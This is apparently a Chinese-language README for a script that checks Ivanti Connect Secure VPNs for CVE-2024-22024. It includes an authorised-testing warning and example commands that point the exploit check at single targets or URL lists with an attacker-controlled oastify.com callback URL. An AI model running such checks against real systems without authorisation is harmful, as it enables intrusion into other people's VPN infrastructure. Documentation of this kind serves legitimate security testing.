检查 Ivanti Connect Secure 中的 CVE-2024-22024 漏洞
[!WARNING] 仅供教育目的和授权测试使用。
-u 或 --target_url:目标 Ivanti Connect Secure (ICS) URL 或包含 URL 列表的文件。
-c 或 --attacker_url:攻击者 URL(可通过 Burp Collaborator、ngrok 或使用 Webhook.site 的唯一 URL 生成)
-t 或 --timeout:请求的超时时间(秒),默认值为 3 秒
测试单个 URL:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
测试 URL 列表:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
使用不同的超时时间(5 秒):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
无论谁发现了这个漏洞……我只是阅读了 PoC 并将其自动化。